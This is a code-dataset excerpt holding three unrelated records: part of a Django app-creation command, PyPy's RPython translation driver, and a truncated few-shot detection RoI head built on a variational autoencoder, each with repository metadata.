            app_path = os.path.join(settings.BASE_DIR, name)
        else:
            app_dir = options['appdir'].strip("/")
            app_path = os.path.join(settings.BASE_DIR, "%s/%s" % (app_dir, name))
        if os.path.isdir(app_dir):
            os.mkdir(app_path)
        else:
            self.stdout.write(self.style.ERROR("Appdir %s not found" % app_dir))
            exit()
        # Render the chosen template into the new directory.
        template_path = get_app_template_path(apps_type)
        call_command("startapp", name, app_path, template=template_path)
        # desc.txt only documents the template itself; drop it from the app.
        os.unlink(os.path.join(app_path, "desc.txt"))
        self.stdout.write(self.style.SUCCESS("Congratulation apps %s successfuly created" % name))
{
"api_name": "newapp.utils.get_app_templates",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.walk",
"line_number": 20,
"usage_type": "call"
},
{
"api... |
43304002854 | import sys, os
import os.path
import shutil
from rpython.translator.translator import TranslationContext
from rpython.translator.tool.taskengine import SimpleTaskEngine
from rpython.translator.goal import query
from rpython.translator.goal.timing import Timer
from rpython.annotator.listdef import s_list_of_strings
from rpython.annotator import policy as annpolicy
from rpython.tool.udir import udir
from rpython.rlib.debug import debug_start, debug_print, debug_stop
from rpython.rlib.entrypoint import secondary_entrypoints,\
annotated_jit_entrypoints
import py
from rpython.tool.ansi_print import AnsiLogger
log = AnsiLogger("translation")
def taskdef(deps, title, new_state=None, expected_states=None,
            idemp=False, earlycheck=None):
    """Decorator factory attaching task metadata to a driver task function.

    deps        -- list of goal names this task depends on
    title       -- human-readable title used for logging
    expected_states -- optional list of states (defaults to a fresh [])
    idemp       -- if True the task is not marked as 'done' after running
    earlycheck  -- callable run at planning time (see TranslationDriver._event)
    """
    def decorator(taskfunc):
        taskfunc.task_deps = deps
        taskfunc.task_title = title
        # NOTE(review): the original code ignored ``new_state`` and always
        # stored None here; preserved as-is since consumers may rely on it.
        taskfunc.task_newstate = None
        # Bug fix: the original default ``expected_states=[]`` was a single
        # shared mutable list aliased by every decorated task; use None as
        # the default and materialise a fresh list per call instead.
        taskfunc.task_expected_states = (
            [] if expected_states is None else expected_states)
        taskfunc.task_idempotent = idemp
        taskfunc.task_earlycheck = earlycheck
        return taskfunc
    return decorator
# TODO:
# sanity-checks using states
# set of translation steps to profile
PROFILE = set([])
class Instrument(Exception):
    """Control-flow exception raised by a task to request instrumentation.

    Caught in TranslationDriver._do, which then re-runs the 'compile' goal
    in the instrumentation child process.
    """
    pass
class ProfInstrument(object):
    """Helper driving an instrumented build and probe run of the executable."""

    name = "profinstrument"

    def __init__(self, datafile, compiler):
        self.datafile = datafile
        self.compiler = compiler

    def first(self):
        """Build the instrumented executable via the C compiler driver."""
        return self.compiler._build()

    def probe(self, exe, args):
        """Run *exe*, pointing it at the counter file via the environment."""
        environment = os.environ.copy()
        environment['PYPY_INSTRUMENT_COUNTERS'] = str(self.datafile)
        self.compiler.platform.execute(exe, args, env=environment)

    def after(self):
        """Terminate the child process immediately once probing is done."""
        os._exit(0)
class TranslationDriver(SimpleTaskEngine):
    """Drive the RPython translation pipeline as a sequence of named tasks.

    Tasks (annotate, rtype_lltype, backendopt_lltype, database_c, source_c,
    compile_c, ...) are declared via @taskdef and executed in dependency
    order by proceed().  Goal names may be given without their backend /
    type-system postfix; backend_select_goals() completes them.
    """
    # Per-backend extra options, set via set_backend_extra_options().
    _backend_extra_options = {}
    def __init__(self, setopts=None, default_goal=None,
                 disable=[],
                 exe_name=None, extmod_name=None,
                 config=None, overrides=None):
        from rpython.config import translationoption
        self.timer = Timer()
        SimpleTaskEngine.__init__(self)
        self.log = log
        if config is None:
            config = translationoption.get_combined_translation_config(translating=True)
        # XXX patch global variable with translation config
        translationoption._GLOBAL_TRANSLATIONCONFIG = config
        self.config = config
        if overrides is not None:
            self.config.override(overrides)
        if setopts is not None:
            self.config.set(**setopts)
        self.exe_name = exe_name
        self.extmod_name = extmod_name
        self.done = {}
        self.disable(disable)
        if default_goal:
            default_goal, = self.backend_select_goals([default_goal])
            if default_goal in self._maybe_skip():
                default_goal = None
        self.default_goal = default_goal
        self.extra_goals = []
        self.exposed = []
        # expose tasks
        # Each task becomes a zero-argument bound callable on the driver
        # (e.g. driver.source() -> proceed('source_c')).
        def expose_task(task, backend_goal=None):
            if backend_goal is None:
                backend_goal = task
            def proc():
                return self.proceed(backend_goal)
            self.exposed.append(task)
            setattr(self, task, proc)
        backend, ts = self.get_backend_and_type_system()
        for task in self.tasks:
            explicit_task = task
            if task == 'annotate':
                expose_task(task)
            else:
                # Tasks are named '<base>_<postfix>' where the postfix is a
                # type system ('lltype') or backend ('c').
                task, postfix = task.split('_')
                if task in ('rtype', 'backendopt', 'llinterpret',
                            'pyjitpl'):
                    if ts:
                        if ts == postfix:
                            expose_task(task, explicit_task)
                    else:
                        expose_task(explicit_task)
                elif task in ('source', 'compile', 'run'):
                    if backend:
                        if backend == postfix:
                            expose_task(task, explicit_task)
                    elif ts:
                        if ts == 'lltype':
                            expose_task(explicit_task)
                    else:
                        expose_task(explicit_task)
    def set_extra_goals(self, goals):
        self.extra_goals = goals
    def set_backend_extra_options(self, extra_options):
        self._backend_extra_options = extra_options
    def get_info(self): # XXX more?
        d = {'backend': self.config.translation.backend}
        return d
    def get_backend_and_type_system(self):
        type_system = self.config.translation.type_system
        backend = self.config.translation.backend
        return backend, type_system
    def backend_select_goals(self, goals):
        # Complete each goal name with the backend/type-system postfix of
        # the current configuration (first match among '', '_<backend>',
        # '_<typesystem>' that names a known task).
        backend, ts = self.get_backend_and_type_system()
        postfixes = [''] + ['_'+p for p in (backend, ts) if p]
        l = []
        for goal in goals:
            for postfix in postfixes:
                cand = "%s%s" % (goal, postfix)
                if cand in self.tasks:
                    new_goal = cand
                    break
            else:
                raise Exception("cannot infer complete goal from: %r" % goal)
            l.append(new_goal)
        return l
    def disable(self, to_disable):
        self._disabled = to_disable
    def _maybe_skip(self):
        # Every task that (transitively) depends on a disabled goal is
        # skipped; dict.fromkeys de-duplicates while keeping hashability.
        maybe_skip = []
        if self._disabled:
            for goal in self.backend_select_goals(self._disabled):
                maybe_skip.extend(self._depending_on_closure(goal))
        return dict.fromkeys(maybe_skip).keys()
    def setup(self, entry_point, inputtypes, policy=None, extra={}, empty_translator=None):
        # Prepare the translator for *entry_point*.  inputtypes is None for
        # a standalone program (the entry point then takes argv).
        standalone = inputtypes is None
        self.standalone = standalone
        if standalone:
            # the 'argv' parameter
            inputtypes = [s_list_of_strings]
        self.inputtypes = inputtypes
        if policy is None:
            policy = annpolicy.AnnotatorPolicy()
        self.policy = policy
        self.extra = extra
        if empty_translator:
            translator = empty_translator
        else:
            translator = TranslationContext(config=self.config)
        self.entry_point = entry_point
        self.translator = translator
        self.libdef = None
        self.secondary_entrypoints = []
        if self.config.translation.secondaryentrypoints:
            for key in self.config.translation.secondaryentrypoints.split(","):
                try:
                    points = secondary_entrypoints[key]
                except KeyError:
                    raise KeyError("Entrypoint %r not found (not in %r)" %
                                   (key, secondary_entrypoints.keys()))
                self.secondary_entrypoints.extend(points)
        self.translator.driver_instrument_result = self.instrument_result
    def setup_library(self, libdef, policy=None, extra={}, empty_translator=None):
        """ Used by carbon python only. """
        self.setup(None, None, policy, extra, empty_translator)
        self.libdef = libdef
        self.secondary_entrypoints = libdef.functions
    def instrument_result(self, args):
        # Fork: the child recompiles with instrumentation enabled (by
        # raising Instrument), the parent waits and reads back the counter
        # file written by the instrumented run.
        backend, ts = self.get_backend_and_type_system()
        if backend != 'c' or sys.platform == 'win32':
            raise Exception("instrumentation requires the c backend"
                            " and unix for now")
        datafile = udir.join('_instrument_counters')
        makeProfInstrument = lambda compiler: ProfInstrument(datafile, compiler)
        pid = os.fork()
        if pid == 0:
            # child compiling and running with instrumentation
            self.config.translation.instrument = True
            self.config.translation.instrumentctl = (makeProfInstrument,
                                                     args)
            raise Instrument
        else:
            pid, status = os.waitpid(pid, 0)
            if os.WIFEXITED(status):
                status = os.WEXITSTATUS(status)
                if status != 0:
                    raise Exception("instrumentation child failed: %d" % status)
            else:
                raise Exception("instrumentation child aborted")
            import array, struct
            # The counter file is a flat array of unsigned longs.
            n = datafile.size()//struct.calcsize('L')
            datafile = datafile.open('rb')
            counters = array.array('L')
            counters.fromfile(datafile, n)
            datafile.close()
            return counters
    def info(self, msg):
        log.info(msg)
    def _profile(self, goal, func):
        # Run *func* under cProfile and dump a KCacheGrind-compatible file.
        from cProfile import Profile
        from rpython.tool.lsprofcalltree import KCacheGrind
        d = {'func':func}
        prof = Profile()
        prof.runctx("res = func()", globals(), d)
        KCacheGrind(prof).output(open(goal + ".out", "w"))
        return d['res']
    def _do(self, goal, func, *args, **kwds):
        # Run one task function with logging and timing.  An Instrument
        # exception from the task switches to the instrumented 'compile'
        # path (see instrument_result).
        title = func.task_title
        if goal in self.done:
            self.log.info("already done: %s" % title)
            return
        else:
            self.log.info("%s..." % title)
        debug_start('translation-task')
        debug_print('starting', goal)
        self.timer.start_event(goal)
        try:
            instrument = False
            try:
                if goal in PROFILE:
                    res = self._profile(goal, func)
                else:
                    res = func()
            except Instrument:
                instrument = True
            if not func.task_idempotent:
                self.done[goal] = True
            if instrument:
                self.proceed('compile')
                assert False, 'we should not get here'
        finally:
            try:
                debug_stop('translation-task')
                self.timer.end_event(goal)
            except (KeyboardInterrupt, SystemExit):
                raise
            except:
                pass
        #import gc; gc.dump_rpy_heap('rpyheap-after-%s.dump' % goal)
        return res
    @taskdef([], "Annotating&simplifying")
    def task_annotate(self):
        """ Annotate
        """
        # includes annotation and annotatation simplifications
        translator = self.translator
        policy = self.policy
        self.log.info('with policy: %s.%s' % (policy.__class__.__module__, policy.__class__.__name__))
        annotator = translator.buildannotator(policy=policy)
        if self.secondary_entrypoints is not None:
            for func, inputtypes in self.secondary_entrypoints:
                if inputtypes == Ellipsis:
                    continue
                annotator.build_types(func, inputtypes, False)
        if self.entry_point:
            s = annotator.build_types(self.entry_point, self.inputtypes)
            translator.entry_point_graph = annotator.bookkeeper.getdesc(self.entry_point).getuniquegraph()
        else:
            s = None
        self.sanity_check_annotation()
        if self.entry_point and self.standalone and s.knowntype != int:
            raise Exception("stand-alone program entry point must return an "
                            "int (and not, e.g., None or always raise an "
                            "exception).")
        annotator.complete()
        annotator.simplify()
        return s
    def sanity_check_annotation(self):
        translator = self.translator
        irreg = query.qoutput(query.check_exceptblocks_qgen(translator))
        if irreg:
            self.log.info("Some exceptblocks seem insane")
        lost = query.qoutput(query.check_methods_qgen(translator))
        assert not lost, "lost methods, something gone wrong with the annotation of method defs"
    RTYPE = 'rtype_lltype'
    @taskdef(['annotate'], "RTyping")
    def task_rtype_lltype(self):
        """ RTyping - lltype version
        """
        rtyper = self.translator.buildrtyper()
        rtyper.specialize(dont_simplify_again=True)
    @taskdef([RTYPE], "JIT compiler generation")
    def task_pyjitpl_lltype(self):
        """ Generate bytecodes for JIT and flow the JIT helper functions
        lltype version
        """
        from rpython.jit.codewriter.policy import JitPolicy
        get_policy = self.extra.get('jitpolicy', None)
        if get_policy is None:
            self.jitpolicy = JitPolicy()
        else:
            self.jitpolicy = get_policy(self)
        #
        from rpython.jit.metainterp.warmspot import apply_jit
        apply_jit(self.translator, policy=self.jitpolicy,
                  backend_name=self.config.translation.jit_backend, inline=True)
        #
        self.log.info("the JIT compiler was generated")
    @taskdef([RTYPE], "test of the JIT on the llgraph backend")
    def task_jittest_lltype(self):
        """ Run with the JIT on top of the llgraph backend
        """
        # parent process loop: spawn a child, wait for the child to finish,
        # print a message, and restart
        from rpython.translator.goal import unixcheckpoint
        unixcheckpoint.restartable_point(auto='run')
        # load the module rpython/jit/tl/jittest.py, which you can hack at
        # and restart without needing to restart the whole translation process
        from rpython.jit.tl import jittest
        jittest.jittest(self)
    BACKENDOPT = 'backendopt_lltype'
    @taskdef([RTYPE, '??pyjitpl_lltype', '??jittest_lltype'], "lltype back-end optimisations")
    def task_backendopt_lltype(self):
        """ Run all backend optimizations - lltype version
        """
        from rpython.translator.backendopt.all import backend_optimizations
        backend_optimizations(self.translator, replace_we_are_jitted=True)
    STACKCHECKINSERTION = 'stackcheckinsertion_lltype'
    @taskdef(['?'+BACKENDOPT, RTYPE, 'annotate'], "inserting stack checks")
    def task_stackcheckinsertion_lltype(self):
        # Insert ll-level stack-overflow checks into the graphs.
        from rpython.translator.transform import insert_ll_stackcheck
        count = insert_ll_stackcheck(self.translator)
        self.log.info("inserted %d stack checks." % (count,))
    def possibly_check_for_boehm(self):
        # Early check (before the database task runs) that the Boehm GC
        # headers are available when gc=boehm is configured.
        if self.config.translation.gc == "boehm":
            from rpython.rtyper.tool.rffi_platform import configure_boehm
            from rpython.translator.platform import CompilationError
            try:
                configure_boehm(self.translator.platform)
            except CompilationError as e:
                i = 'Boehm GC not installed. Try e.g. "translate.py --gc=minimark"'
                raise Exception(str(e) + '\n' + i)
    @taskdef([STACKCHECKINSERTION, '?'+BACKENDOPT, RTYPE, '?annotate'],
             "Creating database for generating c source",
             earlycheck = possibly_check_for_boehm)
    def task_database_c(self):
        """ Create a database for further backend generation
        """
        translator = self.translator
        if translator.annotator is not None:
            translator.frozen = True
        standalone = self.standalone
        get_gchooks = self.extra.get('get_gchooks', lambda: None)
        gchooks = get_gchooks()
        if standalone:
            from rpython.translator.c.genc import CStandaloneBuilder
            cbuilder = CStandaloneBuilder(self.translator, self.entry_point,
                                          config=self.config, gchooks=gchooks,
                                          secondary_entrypoints=
                                          self.secondary_entrypoints + annotated_jit_entrypoints)
        else:
            from rpython.translator.c.dlltool import CLibraryBuilder
            functions = [(self.entry_point, None)] + self.secondary_entrypoints + annotated_jit_entrypoints
            cbuilder = CLibraryBuilder(self.translator, self.entry_point,
                                       functions=functions,
                                       name='libtesting',
                                       config=self.config,
                                       gchooks=gchooks)
        if not standalone: # xxx more messy
            cbuilder.modulename = self.extmod_name
        database = cbuilder.build_database()
        self.log.info("database for generating C source was created")
        self.cbuilder = cbuilder
        self.database = database
    @taskdef(['database_c'], "Generating c source")
    def task_source_c(self):
        """ Create C source files from the generated database
        """
        cbuilder = self.cbuilder
        database = self.database
        if self._backend_extra_options.get('c_debug_defines', False):
            defines = cbuilder.DEBUG_DEFINES
        else:
            defines = {}
        if self.exe_name is not None:
            exe_name = self.exe_name % self.get_info()
        else:
            exe_name = None
        c_source_filename = cbuilder.generate_source(database, defines,
                                                     exe_name=exe_name)
        self.log.info("written: %s" % (c_source_filename,))
        if self.config.translation.dump_static_data_info:
            from rpython.translator.tool.staticsizereport import dump_static_data_info
            targetdir = cbuilder.targetdir
            fname = dump_static_data_info(self.log, database, targetdir)
            dstname = self.compute_exe_name() + '.staticdata.info'
            shutil_copy(str(fname), str(dstname))
            self.log.info('Static data info written to %s' % dstname)
    def compute_exe_name(self, suffix=''):
        # Expand the exe_name pattern; a bare basename is prefixed with './'.
        newexename = self.exe_name % self.get_info()
        if '/' not in newexename and '\\' not in newexename:
            newexename = './' + newexename
        if suffix:
            # Replace the last `.sfx` with the suffix
            newname = py.path.local(newexename.rsplit('.', 1)[0])
            newname = newname.new(basename=newname.basename + suffix)
            return newname
        return py.path.local(newexename)
    def create_exe(self):
        """ Copy the compiled executable into current directory, which is
        pypy/goal on nightly builds
        """
        if self.exe_name is not None:
            exename = self.c_entryp
            newexename = py.path.local(exename.basename)
            shutil_copy(str(exename), str(newexename))
            self.log.info("copied: %s to %s" % (exename, newexename,))
            if self.cbuilder.shared_library_name is not None:
                soname = self.cbuilder.shared_library_name
                newsoname = newexename.new(basename=soname.basename)
                shutil_copy(str(soname), str(newsoname))
                self.log.info("copied: %s to %s" % (soname, newsoname,))
                if hasattr(self.cbuilder, 'executable_name_w'):
                    # Copy pypyw.exe
                    exename_w = self.cbuilder.executable_name_w
                    newexename_w = py.path.local(exename_w.basename)
                    self.log.info("copied: %s to %s" % (exename_w, newexename_w,))
                    shutil_copy(str(exename_w), str(newexename_w))
                    # for pypy, the import library is renamed and moved to
                    # libs/python32.lib, according to the pragma in pyconfig.h
                    libname = self.config.translation.libname
                    oldlibname = soname.new(ext='lib')
                    if not libname:
                        libname = oldlibname.basename
                    libname = str(newsoname.dirpath().join(libname))
                    shutil.copyfile(str(oldlibname), libname)
                    self.log.info("copied: %s to %s" % (oldlibname, libname,))
                    # the pdb file goes in the same place as pypy(w).exe
                    ext_to_copy = ['pdb',]
                    for ext in ext_to_copy:
                        name = soname.new(ext=ext)
                        newname = newexename.new(basename=soname.basename)
                        shutil.copyfile(str(name), str(newname.new(ext=ext)))
                        self.log.info("copied: %s" % (newname,))
                    # HACK: copy libcffi-*.dll which is required for venvs
                    # At some point, we should stop doing this, and instead
                    # use the artifact from packaging the build instead
                    libffi = py.path.local.sysfind('libffi-8.dll')
                    if sys.platform == 'win32' and not libffi:
                        raise RuntimeError('could not find libffi')
                    elif libffi:
                        target = os.getcwd() + r'\libffi-8.dll'
                        if not os.path.exists(target):
                            # in tests, we can mock using windows without libffi
                            shutil.copyfile(str(libffi), target)
            self.c_entryp = newexename
        self.log.info("created: %s" % (self.c_entryp,))
    @taskdef(['source_c'], "Compiling c source")
    def task_compile_c(self):
        """ Compile the generated C code using either makefile or
        translator/platform
        """
        cbuilder = self.cbuilder
        kwds = {}
        if self.standalone and self.exe_name is not None:
            kwds['exe_name'] = self.compute_exe_name().basename
        cbuilder.compile(**kwds)
        if self.standalone:
            self.c_entryp = cbuilder.executable_name
            self.create_exe()
        else:
            self.c_entryp = cbuilder.get_entry_point()
    @taskdef([STACKCHECKINSERTION, '?'+BACKENDOPT, RTYPE], "LLInterpreting")
    def task_llinterpret_lltype(self):
        # Evaluate the entry-point graph on the ll-level interpreter instead
        # of compiling it; mainly useful for debugging the translation.
        from rpython.rtyper.llinterp import LLInterpreter
        translator = self.translator
        interp = LLInterpreter(translator.rtyper)
        bk = translator.annotator.bookkeeper
        graph = bk.getdesc(self.entry_point).getuniquegraph()
        v = interp.eval_graph(graph,
                              self.extra.get('get_llinterp_args',
                                             lambda: [])())
        log.llinterpret("result -> %s" % v)
    def proceed(self, goals):
        # Execute the given goal(s) (string or list), falling back to the
        # default goal; extra goals are always appended.
        if not goals:
            if self.default_goal:
                goals = [self.default_goal]
            else:
                self.log.info("nothing to do")
                return
        elif isinstance(goals, str):
            goals = [goals]
        goals.extend(self.extra_goals)
        goals = self.backend_select_goals(goals)
        result = self._execute(goals, task_skip = self._maybe_skip())
        self.log.info('usession directory: %s' % (udir,))
        return result
    @classmethod
    def from_targetspec(cls, targetspec_dic, config=None, args=None,
                        empty_translator=None,
                        disable=[],
                        default_goal=None):
        # Build a driver from a targetNNN.py-style dict; the 'target'
        # callable may return the entry point alone, a 2-tuple, or a
        # 3-tuple (entry_point, inputtypes, policy).
        if args is None:
            args = []
        driver = cls(config=config, default_goal=default_goal,
                     disable=disable)
        target = targetspec_dic['target']
        spec = target(driver, args)
        try:
            entry_point, inputtypes, policy = spec
        except TypeError:
            # not a tuple at all
            entry_point = spec
            inputtypes = policy = None
        except ValueError:
            policy = None
            entry_point, inputtypes = spec
        driver.setup(entry_point, inputtypes,
                     policy=policy,
                     extra=targetspec_dic,
                     empty_translator=empty_translator)
        return driver
    def prereq_checkpt_rtype(self):
        assert 'rpython.rtyper.rmodel' not in sys.modules, (
            "cannot fork because the rtyper has already been imported")
    prereq_checkpt_rtype_lltype = prereq_checkpt_rtype
    # checkpointing support
    def _event(self, kind, goal, func):
        # Task-engine hook: run early checks at planning time and create a
        # restartable checkpoint (fork) just before the configured goal.
        if kind == 'planned' and func.task_earlycheck:
            func.task_earlycheck(self)
        if kind == 'pre':
            fork_before = self.config.translation.fork_before
            if fork_before:
                fork_before, = self.backend_select_goals([fork_before])
                if not fork_before in self.done and fork_before == goal:
                    prereq = getattr(self, 'prereq_checkpt_%s' % goal, None)
                    if prereq:
                        prereq()
                    from rpython.translator.goal import unixcheckpoint
                    unixcheckpoint.restartable_point(auto='run')
# On POSIX use copy-then-rename so that a *running* executable can still be
# replaced (overwriting it in place would fail — presumably ETXTBSY; the
# rename swaps the directory entry instead).
if os.name == 'posix':
    def shutil_copy(src, dst):
        # this version handles the case where 'dst' is an executable
        # currently being executed
        shutil.copy(src, dst + '~')
        os.rename(dst + '~', dst)
else:
    shutil_copy = shutil.copy
| mozillazg/pypy | rpython/translator/driver.py | driver.py | py | 24,503 | python | en | code | 430 | github-code | 36 | [
{
"api_name": "rpython.tool.ansi_print.AnsiLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.environ.copy",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "os... |
72312960103 | from typing import Dict, List, Optional, Tuple
import numpy as np
import torch
from torch import Tensor
import torch.nn as nn
import torch.nn.functional as F
from mmcv.utils import ConfigDict
from mmdet.core import bbox2roi
from mmdet.models.builder import HEADS
from mmfewshot.detection.models.roi_heads.meta_rcnn_roi_head import MetaRCNNRoIHead
class VAE(nn.Module):
    """Variational auto-encoder over flat feature vectors.

    ``forward`` returns ``[reconstruction, z_inv, input, mu, log_var]``
    where ``z_inv = std + mu`` is a noise-free variant of the sampled
    latent (used by VFARoIHead for aggregation).
    """

    def __init__(self,
                 in_channels: int,
                 latent_dim: int,
                 hidden_dim: int) -> None:
        super(VAE, self).__init__()
        self.latent_dim = latent_dim
        self.encoder = nn.Sequential(
            nn.Linear(in_channels, hidden_dim),
            nn.BatchNorm1d(hidden_dim),
            nn.LeakyReLU()
        )
        self.fc_mu = nn.Linear(hidden_dim, latent_dim)
        self.fc_var = nn.Linear(hidden_dim, latent_dim)
        self.decoder_input = nn.Linear(latent_dim, hidden_dim)
        self.decoder = nn.Sequential(
            nn.Linear(hidden_dim, in_channels),
            nn.BatchNorm1d(in_channels),
            nn.Sigmoid()
        )

    def encode(self, input: Tensor) -> List[Tensor]:
        """Project *input* to the mean / log-variance of the latent Gaussian."""
        hidden = self.encoder(input)
        return [self.fc_mu(hidden), self.fc_var(hidden)]

    def decode(self, z: Tensor) -> Tensor:
        """Map a latent sample back to the input feature space."""
        return self.decoder(self.decoder_input(z))

    def reparameterize(self, mu: Tensor, logvar: Tensor) -> Tensor:
        """Sample z = mu + std * eps; also return the deterministic std + mu."""
        std = torch.exp(0.5 * logvar)
        noise = torch.randn_like(std)
        return noise * std + mu, std + mu

    def forward(self, input: Tensor, **kwargs) -> List[Tensor]:
        mu, log_var = self.encode(input)
        z, z_inv = self.reparameterize(mu, log_var)
        return [self.decode(z), z_inv, input, mu, log_var]

    def loss_function(self, input, rec, mu, log_var, kld_weight=0.00025) -> dict:
        """Reconstruction MSE plus weighted KL divergence to the unit Gaussian."""
        recons_loss = F.mse_loss(rec, input)
        kld_loss = torch.mean(
            -0.5 * torch.sum(1 + log_var - mu ** 2 - log_var.exp(), dim=1),
            dim=0)
        return {'loss_vae': recons_loss + kld_weight * kld_loss}
@HEADS.register_module()
class VFARoIHead(MetaRCNNRoIHead):
    """Meta R-CNN RoI head for VFA: support features are passed through a
    VAE, and the noise-free latent variant (``z_inv``) is used for
    query/support aggregation while the reconstruction feeds the
    meta-classification and VAE losses."""

    def __init__(self, vae_dim=2048, *args, **kargs) -> None:
        # One VAE shared across all classes; input, hidden and latent sizes
        # are all `vae_dim` here.
        super().__init__(*args, **kargs)
        self.vae = VAE(vae_dim, vae_dim, vae_dim)

    def _bbox_forward_train(self, query_feats: List[Tensor],
                            support_feats: List[Tensor],
                            sampling_results: object,
                            query_img_metas: List[Dict],
                            query_gt_bboxes: List[Tensor],
                            query_gt_labels: List[Tensor],
                            support_gt_labels: List[Tensor]) -> Dict:
        """Forward function and calculate loss for box head in training.
        Args:
            query_feats (list[Tensor]): List of query features, each item
                with shape (N, C, H, W).
            support_feats (list[Tensor]): List of support features, each item
                with shape (N, C, H, W).
            sampling_results (obj:`SamplingResult`): Sampling results.
            query_img_metas (list[dict]): List of query image info dict where
                each dict has: 'img_shape', 'scale_factor', 'flip', and may
                also contain 'filename', 'ori_shape', 'pad_shape', and
                'img_norm_cfg'. For details on the values of these keys see
                `mmdet/datasets/pipelines/formatting.py:Collect`.
            query_gt_bboxes (list[Tensor]): Ground truth bboxes for each query
                image with shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y]
                format.
            query_gt_labels (list[Tensor]): Class indices corresponding to
                each box of query images.
            support_gt_labels (list[Tensor]): Class indices corresponding to
                each box of support images.
        Returns:
            dict: Predicted results and losses.
        """
        query_rois = bbox2roi([res.bboxes for res in sampling_results])
        query_roi_feats = self.extract_query_roi_feat(query_feats, query_rois)
        support_feat = self.extract_support_feats(support_feats)[0]
        # VAE over the support features: reconstruction -> meta-cls / VAE
        # losses, z_inv (std + mu) -> aggregation with the query RoIs.
        support_feat_rec, support_feat_inv, _, mu, log_var = self.vae(
            support_feat)
        bbox_targets = self.bbox_head.get_targets(sampling_results,
                                                  query_gt_bboxes,
                                                  query_gt_labels,
                                                  self.train_cfg)
        (labels, label_weights, bbox_targets, bbox_weights) = bbox_targets
        loss_bbox = {'loss_cls': [], 'loss_bbox': [], 'acc': []}
        batch_size = len(query_img_metas)
        num_sample_per_imge = query_roi_feats.size(0) // batch_size
        bbox_results = None
        for img_id in range(batch_size):
            start = img_id * num_sample_per_imge
            end = (img_id + 1) * num_sample_per_imge
            # class agnostic aggregation
            # random_index = np.random.choice(
            #     range(query_gt_labels[img_id].size(0)))
            # random_query_label = query_gt_labels[img_id][random_index]
            # Pick one support class at random and aggregate the query RoIs
            # of this image with every support feature of that class.
            random_index = np.random.choice(
                range(len(support_gt_labels)))
            random_query_label = support_gt_labels[random_index]
            for i in range(support_feat.size(0)):
                if support_gt_labels[i] == random_query_label:
                    bbox_results = self._bbox_forward(
                        query_roi_feats[start:end],
                        support_feat_inv[i].sigmoid().unsqueeze(0))
                    single_loss_bbox = self.bbox_head.loss(
                        bbox_results['cls_score'], bbox_results['bbox_pred'],
                        query_rois[start:end], labels[start:end],
                        label_weights[start:end], bbox_targets[start:end],
                        bbox_weights[start:end])
                    for key in single_loss_bbox.keys():
                        loss_bbox[key].append(single_loss_bbox[key])
        # Average the per-aggregation losses over the batch.
        # NOTE(review): if no support feature matched above, bbox_results
        # stays None and the final `bbox_results.update(...)` would raise —
        # presumably every sampled label always has support features.
        if bbox_results is not None:
            for key in loss_bbox.keys():
                if key == 'acc':
                    loss_bbox[key] = torch.cat(loss_bbox['acc']).mean()
                else:
                    loss_bbox[key] = torch.stack(
                        loss_bbox[key]).sum() / batch_size
        # meta classification loss
        if self.bbox_head.with_meta_cls_loss:
            # input support feature classification
            meta_cls_score = self.bbox_head.forward_meta_cls(support_feat_rec)
            meta_cls_labels = torch.cat(support_gt_labels)
            loss_meta_cls = self.bbox_head.loss_meta(
                meta_cls_score, meta_cls_labels,
                torch.ones_like(meta_cls_labels))
            loss_bbox.update(loss_meta_cls)
        loss_vae = self.vae.loss_function(
            support_feat, support_feat_rec, mu, log_var)
        loss_bbox.update(loss_vae)
        bbox_results.update(loss_bbox=loss_bbox)
        return bbox_results

    def _bbox_forward(self, query_roi_feats: Tensor,
                      support_roi_feats: Tensor) -> Dict:
        """Box head forward function used in both training and testing.
        Args:
            query_roi_feats (Tensor): Query roi features with shape (N, C).
            support_roi_feats (Tensor): Support features with shape (1, C).
        Returns:
            dict: A dictionary of predicted results.
        """
        # feature aggregation
        roi_feats = self.aggregation_layer(
            query_feat=query_roi_feats.unsqueeze(-1).unsqueeze(-1),
            support_feat=support_roi_feats.view(1, -1, 1, 1))[0]
        cls_score, bbox_pred = self.bbox_head(
            roi_feats.squeeze(-1).squeeze(-1), query_roi_feats)
        bbox_results = dict(cls_score=cls_score, bbox_pred=bbox_pred)
        return bbox_results

    def simple_test_bboxes(
            self,
            query_feats: List[Tensor],
            support_feats_dict: Dict,
            query_img_metas: List[Dict],
            proposals: List[Tensor],
            rcnn_test_cfg: ConfigDict,
            rescale: bool = False) -> Tuple[List[Tensor], List[Tensor]]:
        """Test only det bboxes without augmentation.
        Args:
            query_feats (list[Tensor]): Features of query image,
                each item with shape (N, C, H, W).
            support_feats_dict (dict[int, Tensor]) Dict of support features
                used for inference only, each key is the class id and value is
                the support template features with shape (1, C).
            query_img_metas (list[dict]): list of image info dict where each
                dict has: `img_shape`, `scale_factor`, `flip`, and may also
                contain `filename`, `ori_shape`, `pad_shape`, and
                `img_norm_cfg`. For details on the values of these keys see
                :class:`mmdet.datasets.pipelines.Collect`.
            proposals (list[Tensor]): Region proposals.
            rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN.
            rescale (bool): If True, return boxes in original image space.
                Default: False.
        Returns:
            tuple[list[Tensor], list[Tensor]]: Each tensor in first list
                with shape (num_boxes, 4) and with shape (num_boxes, )
                in second list. The length of both lists should be equal
                to batch_size.
        """
        img_shapes = tuple(meta['img_shape'] for meta in query_img_metas)
        scale_factors = tuple(meta['scale_factor'] for meta in query_img_metas)
        rois = bbox2roi(proposals)
        query_roi_feats = self.extract_query_roi_feat(query_feats, rois)
        cls_scores_dict, bbox_preds_dict = {}, {}
        num_classes = self.bbox_head.num_classes
        # Run one aggregation+head pass per support class, keeping only that
        # class' score/regression columns.
        for class_id in support_feats_dict.keys():
            support_feat = support_feats_dict[class_id]
            support_feat_rec, support_feat_inv, _, mu, log_var = self.vae(
                support_feat)
            bbox_results = self._bbox_forward(
                query_roi_feats, support_feat_inv.sigmoid())
            cls_scores_dict[class_id] = \
                bbox_results['cls_score'][:, class_id:class_id + 1]
            bbox_preds_dict[class_id] = \
                bbox_results['bbox_pred'][:, class_id * 4:(class_id + 1) * 4]
            # the official code use the first class background score as final
            # background score, while this code use average of all classes'
            # background scores instead.
            if cls_scores_dict.get(num_classes, None) is None:
